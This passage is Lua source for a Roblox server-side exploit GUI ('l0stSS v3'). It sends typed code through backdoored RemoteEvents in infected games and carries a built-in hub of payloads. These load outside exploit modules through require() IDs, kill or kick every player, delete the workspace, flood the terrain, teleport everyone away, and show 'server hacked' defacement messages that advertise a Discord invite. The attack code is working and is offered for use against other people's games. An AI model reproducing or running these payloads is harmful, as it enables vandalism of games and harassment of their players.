G2L["76"]["Name"] = [[UpdateFrame]];
G2L["76"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["76"]["Size"] = UDim2.new(0, 667, 0, 115);
G2L["76"]["Position"] = UDim2.new(-0.35252, 0, 1.0473, 0);
G2L["76"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["76"]["ScrollBarThickness"] = 6;


-- StarterGui.ScreenGui.Frame.UpdateFrame.UICorner
G2L["77"] = Instance.new("UICorner", G2L["76"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.UIStroke
G2L["78"] = Instance.new("UIStroke", G2L["76"]);
G2L["78"]["Thickness"] = 2.5;


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["79"] = Instance.new("TextLabel", G2L["76"]);
G2L["79"]["TextWrapped"] = true;
G2L["79"]["BorderSizePixel"] = 0;
G2L["79"]["TextSize"] = 14;
G2L["79"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["79"]["TextScaled"] = true;
G2L["79"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["79"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["79"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["79"]["BackgroundTransparency"] = 1;
G2L["79"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["79"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["79"]["Text"] = [[3.5.2: Added Infected games tab, easy access to infected games/games with backdoor.]];
G2L["79"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["7a"] = Instance.new("LocalScript", G2L["79"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.UIListLayout
G2L["7b"] = Instance.new("UIListLayout", G2L["76"]);
G2L["7b"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["7c"] = Instance.new("TextLabel", G2L["76"]);
G2L["7c"]["TextWrapped"] = true;
G2L["7c"]["BorderSizePixel"] = 0;
G2L["7c"]["TextSize"] = 14;
G2L["7c"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["7c"]["TextScaled"] = true;
G2L["7c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7c"]["BackgroundTransparency"] = 1;
G2L["7c"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["7c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7c"]["Text"] = [[3.3.6: some UI rewrite, better aesthetics]];
G2L["7c"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["7d"] = Instance.new("LocalScript", G2L["7c"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["7e"] = Instance.new("TextLabel", G2L["76"]);
G2L["7e"]["TextWrapped"] = true;
G2L["7e"]["BorderSizePixel"] = 0;
G2L["7e"]["TextSize"] = 14;
G2L["7e"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["7e"]["TextScaled"] = true;
G2L["7e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7e"]["BackgroundTransparency"] = 1;
G2L["7e"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["7e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7e"]["Text"] = [[3.2.4: added buttons like reset, removed print and fire all RemoteEvents cuz you can just use a RemoteSpy, this is just a serverside.]];
G2L["7e"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["7f"] = Instance.new("LocalScript", G2L["7e"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["80"] = Instance.new("TextLabel", G2L["76"]);
G2L["80"]["TextWrapped"] = true;
G2L["80"]["BorderSizePixel"] = 0;
G2L["80"]["TextSize"] = 14;
G2L["80"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["80"]["TextScaled"] = true;
G2L["80"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["80"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["80"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["80"]["BackgroundTransparency"] = 1;
G2L["80"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["80"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["80"]["Text"] = [[3.1.2: Replaced Execute, Clear and Inject buttons with icons.]];
G2L["80"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["81"] = Instance.new("LocalScript", G2L["80"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["82"] = Instance.new("TextLabel", G2L["76"]);
G2L["82"]["TextWrapped"] = true;
G2L["82"]["BorderSizePixel"] = 0;
G2L["82"]["TextSize"] = 14;
G2L["82"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["82"]["TextScaled"] = true;
G2L["82"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["82"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["82"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["82"]["BackgroundTransparency"] = 1;
G2L["82"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["82"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["82"]["Text"] = [[3.0.0: MAJOR UI rewrite, more advanced injection and execution. made injecting faster]];
G2L["82"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["83"] = Instance.new("LocalScript", G2L["82"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["84"] = Instance.new("TextLabel", G2L["76"]);
G2L["84"]["TextWrapped"] = true;
G2L["84"]["BorderSizePixel"] = 0;
G2L["84"]["TextSize"] = 14;
G2L["84"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["84"]["TextScaled"] = true;
G2L["84"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["84"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["84"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["84"]["BackgroundTransparency"] = 1;
G2L["84"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["84"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["84"]["Text"] = [[2.7.0: added FAR more scripts and requires to the script hub, very useful for server-side exploiting.]];
G2L["84"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["85"] = Instance.new("LocalScript", G2L["84"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["86"] = Instance.new("TextLabel", G2L["76"]);
G2L["86"]["TextWrapped"] = true;
G2L["86"]["BorderSizePixel"] = 0;
G2L["86"]["TextSize"] = 14;
G2L["86"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["86"]["TextScaled"] = true;
G2L["86"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["86"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["86"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["86"]["BackgroundTransparency"] = 1;
G2L["86"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["86"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["86"]["Text"] = [[2.5.0: made injecting a bit more advanced.]];
G2L["86"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["87"] = Instance.new("LocalScript", G2L["86"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["88"] = Instance.new("TextLabel", G2L["76"]);
G2L["88"]["TextWrapped"] = true;
G2L["88"]["BorderSizePixel"] = 0;
G2L["88"]["TextSize"] = 14;
G2L["88"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["88"]["TextScaled"] = true;
G2L["88"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["88"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["88"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["88"]["BackgroundTransparency"] = 1;
G2L["88"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["88"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["88"]["Text"] = [[2.2.1: added a section for built-in scripts and requires.]];
G2L["88"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["89"] = Instance.new("LocalScript", G2L["88"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["8a"] = Instance.new("TextLabel", G2L["76"]);
G2L["8a"]["TextWrapped"] = true;
G2L["8a"]["BorderSizePixel"] = 0;
G2L["8a"]["TextSize"] = 14;
G2L["8a"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["8a"]["TextScaled"] = true;
G2L["8a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["8a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8a"]["BackgroundTransparency"] = 1;
G2L["8a"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["8a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8a"]["Text"] = [[2.0.0: made a new injector, more advanced backkdoor detection, better textbox and controls.]];
G2L["8a"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["8b"] = Instance.new("LocalScript", G2L["8a"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["8c"] = Instance.new("TextLabel", G2L["76"]);
G2L["8c"]["TextWrapped"] = true;
G2L["8c"]["BorderSizePixel"] = 0;
G2L["8c"]["TextSize"] = 14;
G2L["8c"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["8c"]["TextScaled"] = true;
G2L["8c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["8c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8c"]["BackgroundTransparency"] = 1;
G2L["8c"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["8c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8c"]["Text"] = [[1.8.0: added Polaria and c00lgui to the SS as 2 seperate buttons]];
G2L["8c"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["8d"] = Instance.new("LocalScript", G2L["8c"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["8e"] = Instance.new("TextLabel", G2L["76"]);
G2L["8e"]["TextWrapped"] = true;
G2L["8e"]["BorderSizePixel"] = 0;
G2L["8e"]["TextSize"] = 14;
G2L["8e"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["8e"]["TextScaled"] = true;
G2L["8e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["8e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8e"]["BackgroundTransparency"] = 1;
G2L["8e"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["8e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8e"]["Text"] = [[1.4.0: updated injector]];
G2L["8e"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["8f"] = Instance.new("LocalScript", G2L["8e"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["90"] = Instance.new("TextLabel", G2L["76"]);
G2L["90"]["TextWrapped"] = true;
G2L["90"]["BorderSizePixel"] = 0;
G2L["90"]["TextSize"] = 14;
G2L["90"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["90"]["TextScaled"] = true;
G2L["90"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["90"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["90"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["90"]["BackgroundTransparency"] = 1;
G2L["90"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["90"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["90"]["Text"] = [[1.0.0: the first version of l0st serverside, which you can still get and use today thru my github, i will hopefully add buttons to load old serverside versions.]];
G2L["90"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel.LocalScript
G2L["91"] = Instance.new("LocalScript", G2L["90"]);



-- StarterGui.ScreenGui.Frame.Logs
G2L["92"] = Instance.new("ImageButton", G2L["4"]);
G2L["92"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["92"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["92"]["Image"] = [[rbxassetid://7546954294]];
G2L["92"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["92"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["92"]["Name"] = [[Logs]];
G2L["92"]["Position"] = UDim2.new(0.71942, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Logs.LocalScript
G2L["93"] = Instance.new("LocalScript", G2L["92"]);



-- StarterGui.ScreenGui.Frame.Logs.UICorner
G2L["94"] = Instance.new("UICorner", G2L["92"]);



-- StarterGui.ScreenGui.Frame.Logs.UIStroke
G2L["95"] = Instance.new("UIStroke", G2L["92"]);
G2L["95"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["95"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Logs.LocalScript
G2L["96"] = Instance.new("LocalScript", G2L["92"]);



-- StarterGui.ScreenGui.LocalScript
local function C_2()
local script = G2L["2"];
	local replicatedStorage = game:GetService("ReplicatedStorage")
	local screenGui = script.Parent
	local frame = screenGui:FindFirstChildOfClass("Frame")
	
	-- GUI references inside Frame
	local textbox = frame:FindFirstChild("TextBox")
	local executeButton = frame:FindFirstChild("Execute")
	local clearButton = frame:FindFirstChild("Clear")
	local injectButton = frame:FindFirstChild("Inject")
	
	
	if not textbox or not executeButton or not clearButton or not injectButton then
		warn("Missing GUI components.")
		return
	end
	
	
	executeButton.MouseButton1Click:Connect(function()
		local payload = textbox.Text
		if payload and payload ~= "" then
			local remote =
				replicatedStorage:FindFirstChild("Backdoor") or
				replicatedStorage:FindFirstChild("RemoteEvent") or
				replicatedStorage:FindFirstChild("RE")
	
			if remote and remote:IsA("RemoteEvent") then
				pcall(function()
					remote:FireServer(payload)
				end)
				print("Code fired through:", remote.Name)
			else
				warn("No valid RemoteEvent found.")
			end
		end
	end)
	
	
	clearButton.MouseButton1Click:Connect(function()
		textbox.Text = ""
		print("wiped textbox clean like grandma cookies")
	end)
	
	
	injectButton.MouseButton1Click:Connect(function()
		local testPayload = 'print("backdoor test")'
		local found = false
	
		for _, obj in ipairs(replicatedStorage:GetChildren()) do
			if obj:IsA("RemoteEvent") then
				local success = pcall(function()
					obj:FireServer(testPayload)
				end)
	
				if success then
					found = true
					print("Injected into RemoteEvent:", obj.Name)
					break
				end
			end
		end
	
		if not found then
			print("No active backdoor RemoteEvent found.")
		end
	end)
end;
task.spawn(C_2);
-- StarterGui.ScreenGui.LocalScript
local function C_3()
local script = G2L["3"];
	local Players = game:GetService("Players")
	local StarterGui = game:GetService("StarterGui")
	local LocalPlayer = Players.LocalPlayer
	local username = LocalPlayer.Name
	
	StarterGui:SetCore("SendNotification", {
		Title = "l0stSS v3 notification",
		Text = "l0stSS v3 by TLK88 (team l0stk1dd88) loaded successfully! welcome to l0stSS V3, " .. username,
		Icon = "rbxassetid://81013369562879", -- TLK88 icon
		Duration = 4
	})
end;
task.spawn(C_3);
-- StarterGui.ScreenGui.Frame.LocalScript
local function C_5()
local script = G2L["5"];
	-- LocalScript inside your Frame
	
	local frame = script.Parent
	local dragging = false
	local dragInput, mousePos, framePos
	
	frame.Active = true
	frame.Selectable = true
	frame.Draggable = false -- well handle it manually
	
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 then
			dragging = true
			mousePos = input.Position
			framePos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	frame.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement then
			dragInput = input
		end
	end)
	
	game:GetService("UserInputService").InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			local delta = input.Position - mousePos
			frame.Position = UDim2.new(
				framePos.X.Scale,
				framePos.X.Offset + delta.X,
				framePos.Y.Scale,
				framePos.Y.Offset + delta.Y
			)
		end
	end)
end;
task.spawn(C_5);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_b()
local script = G2L["b"];
	local textbox = script.Parent
	
	textbox.ClearTextOnFocus = false
end;
task.spawn(C_b);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_c()
local script = G2L["c"];
	local textBox = script.Parent
	
	textBox.ClearTextOnFocus = false
	textBox.MultiLine = true
	textBox.TextWrapped = true
	
	-- Prevent Enter from unfocusing the TextBox
	textBox.FocusLost:Connect(function(enterPressed)
		if enterPressed then
			textBox:CaptureFocus()
		end
	end)
	
	-- Insert newline when Enter is pressed
	textBox.InputBegan:Connect(function(input, gameProcessed)
		if gameProcessed then return end
		if input.UserInputType == Enum.UserInputType.Keyboard then
			if input.KeyCode == Enum.KeyCode.Return or input.KeyCode == Enum.KeyCode.KeypadEnter then
				local cursorPos = textBox.CursorPosition or #textBox.Text + 1
				local before = string.sub(textBox.Text, 1, cursorPos - 1)
				local after = string.sub(textBox.Text, cursorPos)
				textBox.Text = before .. "\n" .. after
				textBox.CursorPosition = cursorPos + 1
			end
		end
	end)
end;
task.spawn(C_c);
-- StarterGui.ScreenGui.Frame.TextBox.Completor
local function C_d()
local script = G2L["d"];
	local textBox = script.Parent
	local lastText = ""
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local currentText = textBox.Text
		local cursor = textBox.CursorPosition
	
		-- Only react if one character was added
		if #currentText == #lastText + 1 then
			local typedChar = currentText:sub(cursor - 1, cursor - 1)
	
			if typedChar == "(" then
				-- Remove the typed "(" and insert "()"
				local before = currentText:sub(1, cursor - 2)
				local after = currentText:sub(cursor)
				textBox.Text = before .. "()" .. after
				textBox.CursorPosition = #before + 2
	
			elseif typedChar == "\"" then
				-- Remove the typed "\"" and insert "\"\""
				local before = currentText:sub(1, cursor - 2)
				local after = currentText:sub(cursor)
				textBox.Text = before .. "\"\"" .. after
				textBox.CursorPosition = #before + 2
			end
		end
	
		lastText = textBox.Text
	end)
end;
task.spawn(C_d);
-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
local function C_11()
local script = G2L["11"];
	local Players = game:GetService("Players")
	local LocalPlayer = Players.LocalPlayer
	local username = LocalPlayer.Name
	
	-- GUI hierarchy
	local scriptHubFrame = script.Parent
	local mainFrame = scriptHubFrame.Parent
	local textbox = mainFrame:FindFirstChild("TextBox")
	
	--  Music settings
	local musicId = "95156028272944"
	local playbackSpeed = 0.2
	
	--  Skybox settings
	local skyboxId = "111473923563814"
	
	--  Decal settings
	local decalId = "81013369562879"
	
	-- Exploit payloads
	local buttons = {
		c00lgui = 'require(14125553864):Fire("' .. username .. '","c00lkidd")',
		polaria = 'require(123255432303221):Pload("' .. username .. '")',
		hdadmin = 'require(7192763922).load("' .. username .. '")',
		["1xgui"] = 'require(6858594080).KrnKidsSus("' .. username .. '")',
		c00lkidd = 'require(89709417365094).Forsaken("' .. username .. '","c00lkidd")',
		killall = [[
	for _, p in pairs(game.Players:GetPlayers()) do
		if p.Character and p.Character:FindFirstChild("Humanoid") then
			p.Character.Humanoid.Health = 0
		end
	end
	]],
		clearworkspace = [[
	for _, obj in pairs(workspace:GetChildren()) do
		if not obj:IsA("Terrain") and obj.Name ~= "Camera" then
			obj:Destroy()
		end
	end
	]],
		hint = [[
	local hint = Instance.new("Hint", workspace)
	hint.Text = "This server has been hacked by TLK88 (team l0stk1dd88) you noobs! prepare for chaos! join us in our disc invite: https://discord.gg/93xs9dAECK"
	]],
		deletehints = [[
	for _, obj in pairs(workspace:GetChildren()) do
		if obj:IsA("Hint") then
			obj:Destroy()
		end
	end
	]],
		playmusic = [[
	local sound = Instance.new("Sound", workspace)
	sound.SoundId = "rbxassetid://]] .. musicId .. [["
	sound.PlaybackSpeed = ]] .. playbackSpeed .. [[
	sound.Volume = 1
	sound.Looped = true
	sound:Play()
	]],
		setskybox = [[
	local sky = Instance.new("Sky", game.Lighting)
	sky.SkyboxBk = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxDn = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxFt = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxLf = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxRt = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxUp = "rbxassetid://]] .. skyboxId .. [["
	]],
		fixskybox = [[
	for _, obj in pairs(game.Lighting:GetChildren()) do
		if obj:IsA("Sky") then
			obj:Destroy()
		end
	end
	]],
		decalspam = [[
	local decalId = "rbxassetid://]] .. decalId .. [["
	
	for _, part in pairs(workspace:GetDescendants()) do
		if part:IsA("BasePart") then
			for _, face in pairs(Enum.NormalId:GetEnumItems()) do
				local decal = Instance.new("Decal")
				decal.Face = face
				decal.Texture = decalId
				decal.Parent = part
			end
		end
	end
	]],
		flood = [[
	local terrain = workspace.Terrain
	local regionSize = Vector3.new(2048, 1000, 2048)
	local regionCenter = Vector3.new(0, 0, 0)
	terrain:FillBlock(CFrame.new(regionCenter), regionSize, Enum.Material.Water)
	]],
		kickall = [[
	for _, p in pairs(game.Players:GetPlayers()) do
		p:Kick("you have been kicked by TLK88(team l0stk1dd88) you stupid noob! join us today! disc invite: https://discord.gg/93xs9dAECK")
	end
	]],
		hackmessage = [[
	for _, player in pairs(game.Players:GetPlayers()) do
		local gui = Instance.new("ScreenGui")
		gui.Name = "TLK88Overlay"
		gui.ResetOnSpawn = false
		gui.Parent = player:WaitForChild("PlayerGui")
	
		local label = Instance.new("TextLabel")
		label.Size = UDim2.new(0, 400, 0, 50)
		label.Position = UDim2.new(0, 10, 1, -60)
		label.BackgroundTransparency = 1
		label.TextColor3 = Color3.new(1, 1, 1)
		label.TextScaled = true
		label.Font = Enum.Font.SourceSansBold
		label.Text = "this server has been hacked by TLK88 you noobs! prepare for chaos!"
		label.Parent = gui
	end
	]],
		clearwater = "workspace.Terrain:Clear()",
		trollall = [[
	for _, player in pairs(game.Players:GetPlayers()) do
		local gui = Instance.new("ScreenGui")
		gui.Name = "TLK88Troll"
		gui.ResetOnSpawn = false
		gui.Parent = player:WaitForChild("PlayerGui")
	
		local img = Instance.new("ImageLabel")
		img.Size = UDim2.new(1, 0, 1, 0)
		img.Position = UDim2.new(0, 0, 0, 0)
		img.BackgroundTransparency = 1
		img.Image = "rbxassetid://94667677722688"
		img.Parent = gui
	
		local sound = Instance.new("Sound")
		sound.SoundId = "rbxassetid://136247552074672"
		sound.Volume = 100
		sound.Looped = false
		sound.Parent = gui
		sound:Play()
	
		task.delay(8, function()
			gui:Destroy()
		end)
	end
	]],
		atmosphere = [[
	for _, obj in pairs(game.Lighting:GetChildren()) do
		if obj:IsA("Atmosphere") then
			obj:Destroy()
		end
	end
	]]
	}
	
	-- Safety check
	if not textbox then
		warn(" TextBox not found.")
		return
	end
	
	-- Connect each button dynamically
	for name, code in pairs(buttons) do
		local btn = scriptHubFrame:FindFirstChild(name)
		if btn and btn:IsA("TextButton") then
			btn.MouseButton1Click:Connect(function()
				textbox.Text = code
			end)
		end
	end
	
	-- Wire ClearWater button logic
	local clearBtn = scriptHubFrame:FindFirstChild("clearwater")
	if clearBtn and clearBtn:IsA("TextButton") then
		clearBtn.MouseButton1Click:Connect(function()
			textbox.Text = buttons.clearwater
		end)
	end
	
	-- Wire Atmosphere button logic
	local atmosphereBtn = scriptHubFrame:FindFirstChild("atmosphere")
	if atmosphereBtn and atmosphereBtn:IsA("TextButton") then
		atmosphereBtn.MouseButton1Click:Connect(function()
			textbox.Text = buttons.atmosphere
		end)
	end
	
	-- Wire DeleteAll button logic
	local deleteAllBtn = scriptHubFrame:FindFirstChild("deleteall")
	if deleteAllBtn and deleteAllBtn:IsA("TextButton") then
		deleteAllBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[
	for _, obj in pairs(workspace:GetChildren()) do
		if obj.Name ~= "Camera" and not obj:IsA("Terrain") then
			obj:Destroy()
		end
	end
	]]
		end)
	end
	
	-- Wire KillSound button logic
	local killSoundBtn = scriptHubFrame:FindFirstChild("killsound")
	if killSoundBtn and killSoundBtn:IsA("TextButton") then
		killSoundBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[
			for _, obj in pairs(workspace:GetDescendants()) do
	    if obj:IsA("Sound") then
	        obj:Destroy()
	    end
	end
	]]
		end)
	end
	
	local destroyDecalBtn = scriptHubFrame:FindFirstChild("destroydecal")
	if destroyDecalBtn and destroyDecalBtn:IsA("TextButton") then
		destroyDecalBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[for _, obj in pairs(workspace:GetDescendants()) do
	    if obj:IsA("Decal") then
	        obj:Destroy()
	    end
	end
	]]
		end)
	end
	
	local hackMsgBtn = scriptHubFrame:FindFirstChild("hackmsg")
	if hackMsgBtn and hackMsgBtn:IsA("TextButton") then
		hackMsgBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local messageText = "this server has been hacked by team l0stk1dd88 you noobs! prepare for chaos! join us in disc invite:93xs9dAECK"
	
	local msg = Instance.new("Message")
	msg.Text = messageText
	msg.Parent = workspace
	
	-- Auto-remove after 4 seconds
	task.delay(6, function()
	    msg:Destroy()
	end)
	]]
		end)
	end
	
	local billBoardBtn = scriptHubFrame:FindFirstChild("billboard")
	if billBoardBtn and billBoardBtn:IsA("TextButton") then
		billBoardBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	
	for _, player in pairs(Players:GetPlayers()) do
	    local character = player.Character or player.CharacterAdded:Wait()
	    local head = character:FindFirstChild("Head")
	    if head then
	        local billboard = Instance.new("BillboardGui")
	        billboard.Name = "TLK88_Billboard"
	        billboard.Size = UDim2.new(0, 200, 0, 50)
	        billboard.Adornee = head
	        billboard.AlwaysOnTop = true
	        billboard.StudsOffset = Vector3.new(0, 2.5, 0) 
	        billboard.Parent = head
	
	        local label = Instance.new("TextLabel")
	        label.Size = UDim2.new(1, 0, 1, 0)
	        label.BackgroundTransparency = 1
	        label.TextColor3 = Color3.fromRGB(0, 170, 255) -- TLK88 blue
	        label.TextScaled = true
	        label.Font = Enum.Font.Legacy
	        label.Text = "l0stk1dd88"
	        label.Parent = billboard
	    end
	end
	]]
		end)
	end
	
	local timeWarpBtn = scriptHubFrame:FindFirstChild("timewarp")
	if timeWarpBtn and timeWarpBtn:IsA("TextButton") then
		timeWarpBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[while true do
		game:GetService("Lighting").ClockTime = math.random(0, 24)
		task.wait(0.1)
	end
	]]
		end)
	end
	
	local tpAllBtn = scriptHubFrame:FindFirstChild("tpall")
	if tpAllBtn and tpAllBtn:IsA("TextButton") then
		tpAllBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local TeleportService = game:GetService("TeleportService")
	local targetPlaceId = 101701244760490 --  Replace with your target experience's Place ID
	
	for _, player in pairs(game.Players:GetPlayers()) do
		TeleportService:Teleport(targetPlaceId, player)
	end
	]]
		end)
	end
	
	local billboardAllBtn = scriptHubFrame:FindFirstChild("billboardall")
